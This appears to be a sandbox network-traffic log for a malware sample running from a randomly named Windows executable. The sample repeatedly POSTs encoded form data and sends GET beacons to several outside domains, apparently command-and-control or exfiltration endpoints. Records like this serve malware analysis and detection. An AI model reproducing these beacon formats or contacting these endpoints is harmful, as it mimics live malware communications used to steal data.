Process: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe

Timestamp: Nov 5, 2024 15:34:11.254879951 CET
Bytes transferred: 773
Direction: OUT
Data:
POST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1

Timestamp: Nov 5, 2024 15:34:11.580182076 CET
Bytes transferred: 1289
Direction: IN
Data:
HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:11 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID: 3
Source IP: 192.168.11.20
Source Port: 49744
Destination IP: 66.198.240.15
Destination Port: 80
PID: 4732
Process: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe

Timestamp: Nov 5, 2024 15:34:13.911338091 CET
Bytes transferred: 7922
Direction: OUT
Data:
POST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1

Timestamp: Nov 5, 2024 15:34:14.253125906 CET
Bytes transferred: 1289
Direction: IN
Data:
HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:13 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49745 | 66.198.240.15 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:16.563752890 CET | 466 | OUT | GET /ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:34:16.834894896 CET | 618 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                              Date: Tue, 05 Nov 2024 14:34:16 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              X-Redirect-By: WordPress
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Location: http://abuali-contracting.art/ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49746 | 3.33.130.190 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:22.082684040 CET | 729 | OUT | POST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 79 2b 70 37 2b 66 39 67 47 72 45 71 4d 70 38 65 42 55 59 67 78 6b 36 48 63 44 67 44 59 78 59 52 69 2f 41 76 39 74 5a 2f 47 4c 57 66 4a 76 72 78 59 35 53 4c 2f 72 73 6f 66 75 4a 38 50 47 6c 69 61 4c 33 4d 4c 69 46 6e 6f 2f 70 44 69 71 30 59 6c 32 78 30 63 45 71 48 30 76 51 4e 55 65 4a 51 34 41 63 51 37 56 6b 66 43 34 57 42 30 31 41 53 70 59 41 65 35 76 52 34 57 56 78 64 70 6e 55 53 5a 42 6a 45 6e 68 34 48 54 47 51 79 78 6b 38 62 63 62 33 6d 46 4d 45 34 6a 34 55 54 56 78 51 2b 54 53 56 79 52 78 32 66 49 58 6b 6c 50 35 57 78 66 48 48 52 69 51 3d 3d
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE1y+p7+f9gGrEqMp8eBUYgxk6HcDgDYxYRi/Av9tZ/GLWfJvrxY5SL/rsofuJ8PGliaL3MLiFno/pDiq0Yl2x0cEqH0vQNUeJQ4AcQ7VkfC4WB01ASpYAe5vR4WVxdpnUSZBjEnh4HTGQyxk8bcb3mFME4j4UTVxQ+TSVyRx2fIXklP5WxfHHRiQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49747 | 3.33.130.190 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:24.726747036 CET | 749 | OUT | POST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 30 75 35 37 38 38 56 67 41 4c 45 70 51 35 38 65 61 45 59 6b 78 6a 79 48 63 43 6c 49 5a 44 4d 52 69 61 6b 76 2b 73 5a 2f 42 4c 57 66 43 50 72 4f 58 5a 53 55 2f 72 67 67 66 75 46 38 50 43 46 69 61 4c 6e 4d 4c 52 64 6d 70 76 70 42 36 61 30 61 34 6d 78 30 63 45 71 48 30 76 30 6e 55 66 68 51 2f 77 41 51 36 30 6b 51 63 49 58 7a 31 31 41 53 74 59 41 61 35 76 52 61 57 55 74 33 70 6b 73 53 5a 44 37 45 6d 77 34 47 49 57 51 34 2f 45 39 48 56 5a 61 35 44 63 73 2b 69 37 6b 72 64 67 4e 45 66 6b 45 6f 4d 44 43 37 4c 45 34 58 4c 4a 76 5a 64 46 47 4b 2f 5a 42 5a 37 63 46 78 4e 6c 6e 62 45 35 73 31 59 48 4f 5a 76 79 49 3d
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE10u5788VgALEpQ58eaEYkxjyHcClIZDMRiakv+sZ/BLWfCPrOXZSU/rggfuF8PCFiaLnMLRdmpvpB6a0a4mx0cEqH0v0nUfhQ/wAQ60kQcIXz11AStYAa5vRaWUt3pksSZD7Emw4GIWQ4/E9HVZa5Dcs+i7krdgNEfkEoMDC7LE4XLJvZdFGK/ZBZ7cFxNlnbE5s1YHOZvyI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49748 | 3.33.130.190 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:27.366565943 CET | 7734 | OUT | POST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49749 | 3.33.130.190 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:30.007213116 CET | 458 | OUT | GET /5g7z/?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.godskids.store
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:34:30.128454924 CET | 389 | IN | HTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:34:30 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 32 5f 34 3d 6b 4b 38 65 47 5a 65 4f 4c 30 63 30 69 37 70 5a 30 4f 4e 50 49 4e 59 41 47 5a 6f 41 50 57 70 64 34 6e 43 4c 65 67 67 6a 63 6a 38 48 6f 50 41 4a 6a 73 70 53 47 6f 6d 41 4d 75 44 53 53 61 79 77 31 62 4d 6e 4c 36 4a 66 47 6a 59 33 50 39 71 74 43 30 77 2b 72 75 6c 34 32 2f 35 70 6b 6c 52 70 51 31 76 61 30 74 30 6b 44 64 56 56 71 55 39 72 7a 45 55 2f 44 4b 77 3d 26 75 58 50 3d 31 48 58 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49750 | 161.97.142.144 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:35.654304028 CET | 726 | OUT | POST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 33 4a 46 44 43 33 78 71 31 37 52 6c 6b 33 57 49 45 66 46 4a 73 2b 4d 53 70 4f 6b 74 4f 2f 7a 6a 65 7a 6c 2b 43 36 63 47 33 51 63 4b 74 48 2f 65 53 5a 49 6c 34 58 74 69 79 5a 4d 34 6d 48 56 61 5a 4a 64 4f 35 6b 6f 33 62 35 38 52 42 2b 38 63 42 65 51 61 6e 50 67 6a 67 32 6d 56 38 55 52 4a 34 38 64 69 4e 69 59 4d 66 5a 76 65 53 4e 72 68 64 33 33 57 33 49 7a 61 2b 62 79 71 64 74 76 61 31 43 77 68 41 42 77 4f 72 46 6f 5a 75 32 4a 66 6c 42 31 63 52 51 66 62 66 4c 50 69 71 5a 35 33 55 71 53 41 5a 6b 33 54 6e 31 32 6b 4c 61 6b 7a 75 6e 65 6b 69 44 63 75 43 32 47 45 42 68 35 41 56 67 3d 3d
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17Rlk3WIEfFJs+MSpOktO/zjezl+C6cG3QcKtH/eSZIl4XtiyZM4mHVaZJdO5ko3b58RB+8cBeQanPgjg2mV8URJ48diNiYMfZveSNrhd33W3Iza+byqdtva1CwhABwOrFoZu2JflB1cRQfbfLPiqZ53UqSAZk3Tn12kLakzunekiDcuC2GEBh5AVg==
Nov 5, 2024 15:34:35.855681896 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:34:35 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49751 | 161.97.142.144 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:38.393518925 CET | 746 | OUT | POST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 33 4a 46 44 43 33 78 71 31 37 52 6c 6b 57 47 49 43 4d 64 4a 72 65 4d 64 6e 75 6b 74 41 66 7a 6e 65 7a 70 2b 43 2b 46 42 33 46 4d 4b 6a 44 7a 65 54 59 49 6c 35 58 74 69 36 35 4d 35 6f 6e 56 52 5a 4a 52 38 35 6d 73 33 62 35 59 52 42 37 41 63 47 6f 59 5a 6f 2f 67 68 70 57 6d 58 2f 6b 52 4a 34 38 64 69 4e 69 63 79 66 5a 33 65 56 39 62 68 66 54 62 52 35 6f 7a 46 35 62 79 71 5a 74 76 57 31 43 78 79 41 45 55 6f 72 48 51 5a 75 33 35 66 69 54 64 62 62 51 66 42 62 4c 4f 63 6d 61 67 64 64 2b 75 73 59 48 62 57 74 32 6d 74 4b 4d 31 70 7a 56 71 41 68 51 41 63 47 47 2f 73 44 6a 34 62 49 76 36 77 70 45 36 38 34 54 73 7a 33 67 44 38 6f 5a 55 50 30 49 6b 3d
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17RlkWGICMdJreMdnuktAfznezp+C+FB3FMKjDzeTYIl5Xti65M5onVRZJR85ms3b5YRB7AcGoYZo/ghpWmX/kRJ48diNicyfZ3eV9bhfTbR5ozF5byqZtvW1CxyAEUorHQZu35fiTdbbQfBbLOcmagdd+usYHbWt2mtKM1pzVqAhQAcGG/sDj4bIv6wpE684Tsz3gD8oZUP0Ik=
Nov 5, 2024 15:34:38.588337898 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:34:38 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
Nov 5, 2024 15:34:38.588388920 CET | 317 | IN | (continuation of the gzip-compressed response body)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49752 | 161.97.142.144 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:41.117851019 CET | 7895 | OUT | POST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:34:41.309434891 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:34:41 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
Nov 5, 2024 15:34:41.309484959 CET | 317 | IN | (continuation of the gzip-compressed response body)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49753 | 161.97.142.144 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:43.830497980 CET | 457 | OUT | GET /o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.030002832.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:34:44.022392035 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:34:43 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Content-Length: 2966
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: "66cce1df-b96"
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 5, 2024 15:34:44.022435904 CET | 1289 | IN
                                                                                                              Data Ascii: ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25
Nov 5, 2024 15:34:44.022479057 CET | 592 | IN
                                                                                                              Data Ascii: 7 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49754 | 119.18.54.27 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:50.393707991 CET | 726 | OUT | POST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:34:50.887130976 CET | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:50 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49755 | 119.18.54.27 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:53.335347891 CET | 746 | OUT | POST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:34:53.830602884 CET | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:53 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49756 | 119.18.54.27 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:56.308614016 CET | 1289 | OUT | POST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
